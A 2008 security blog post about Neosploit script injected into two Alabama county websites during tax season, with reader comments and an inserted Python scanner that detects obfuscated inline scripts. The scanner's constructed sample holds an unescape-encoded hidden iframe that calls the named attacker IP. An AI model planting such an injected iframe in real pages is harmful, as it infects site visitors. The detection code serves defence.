Thursday, March 13, 2008

Unfortunate hack at tax time

Hi folks,

We noticed a couple of Alabama county websites have been hacked, with a Neosploit call out to a website in Germany.

The two websites are...

hxxp://www.co.blount.al.us/ and
hxxp://www.blountrevenue.com/

(The actual exploit server in Germany seems to be 404 at the moment, but you should still be careful)

The second one is more interesting, particularly given the time of year. The front page looks like this ...

Looks pretty innocent, doesn't it? If you're good at HTML, and you make a point of looking at page source, you might notice something weird at the top of the page ...

but you probably won't, because no one looks at source much anyway. ;-)

If you have a Really Useful Tool (tm) like our Browser Helper Object, you'll probably notice that it's reaching out to a funny looking site ...

That's because the funny looking javascript is actually a Neosploit obfuscation that decrypts to a call to an attack script at 78.47.147.188. This site is currently 404, but it might come back to life at any time, so be careful.
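As an added illustration (not part of the original post), here is a small Python scanner of the kind a defender might run over a saved copy of a page: it pulls out inline scripts, decodes percent-escaped blobs the way JavaScript's unescape() would, and flags any script that both calls a decoder and, once decoded, resolves to an IP-literal URL. The sample page and its hidden iframe are constructed; only the call-out address comes from the post.

```python
import re
import math
from urllib.parse import unquote

# Constructed sample page (not the real revenue site): an obfuscated script
# injected above the normal markup, as the post describes. The decoded payload
# is a zero-size iframe pointing at the IP named in the post.
HIDDEN_FRAME = '<iframe src="http://78.47.147.188/x.php" width=0 height=0></iframe>'
ENCODED = ''.join('%%%02X' % ord(c) for c in HIDDEN_FRAME)  # unescape()-style %XX
SAMPLE_HTML = (
    "<script>var s='" + ENCODED + "';document.write(unescape(s));</script>\n"
    "<html><head><title>County Revenue</title>\n"
    "<script>function show(id){document.getElementById(id).style.display='';}</script>\n"
    "</head><body><p>Pay your property taxes online.</p></body></html>\n"
)

SCRIPT_RE = re.compile(r'<script[^>]*>(.*?)</script>', re.I | re.S)
IP_URL_RE = re.compile(r'https?://(?:\d{1,3}\.){3}\d{1,3}[^\s"\'<>]*', re.I)
DECODER_RE = re.compile(r'\b(eval|unescape|fromCharCode|document\.write)\b')

def shannon_entropy(text):
    """Bits per character; long %XX or hex blobs score higher than plain JS."""
    if not text:
        return 0.0
    n = len(text)
    counts = {ch: text.count(ch) for ch in set(text)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def analyze_script(body):
    """Describe one inline script: decoder calls, entropy, IP-literal URLs after decoding."""
    decoded = unquote(body)  # mimics JS unescape() for %XX sequences (not %uXXXX)
    return {
        "decoder_calls": sorted(set(DECODER_RE.findall(body))),
        "entropy": round(shannon_entropy(body), 2),
        "ip_urls": IP_URL_RE.findall(decoded),
    }

def scan_page(html):
    """Return findings for scripts that use a decoder and decode to an IP-literal URL."""
    findings = []
    for index, body in enumerate(SCRIPT_RE.findall(html)):
        info = analyze_script(body)
        if info["decoder_calls"] and info["ip_urls"]:
            info["script_index"] = index
            findings.append(info)
    return findings

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML):
        print(finding)
```

The benign helper script in the sample is not reported, because it neither calls a decoder nor contains an IP-literal URL.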

We've told the very nice folks at the revenue website, so it should be cleaned up soon. It's just a particularly unfortunate website to be hacked at tax time.

Cheers

Roger


4 Comments:

At 3:30 AM, Anonymous Anonymous said...

Coming from a systems programming background, I don't have too much experience with all the new web technology. But I have heard of the 'same origin' policy and every time I hear of these kinds of attacks, I just don't understand how they work (if there is a same origin policy in place). Is it just browsers implementing it badly or users ignoring browser warnings or am I just asking the wrong question here out of my web 2.0 ignorance?

Btw, it's fascinating reading your blog. Keep up the great work!

At 12:25 AM, Anonymous Anonymous said...

Hi, where can I submit a request to re-test a website that was wrongfully marked as a "cracks site"? The site I'm talking about is for our product, Backup4all, and I have the impression that linkscanner blocks it because we have a page optimized for people that are searching for cracks, which is http://www.backup4all.com/backup4all-crack.php

Thank you.

At 6:10 PM, Blogger tcsl said...

Anonymous asked how this stuff could work... the answer is that it's not _supposed_ to work. But it does ... they've found a vulnerability that shouldn't exist if everything was done right, but all software has bugs. They find a bug and create an exploit.

At 6:11 PM, Blogger tcsl said...

Claudiu Spulber asked how to get a website re-evaluated...

Hi Claudiu... the problem would indeed have been the cracks page, but we've adjusted things, and it should be cleared in the next update... today or tomorrow.

Cheers

Roger
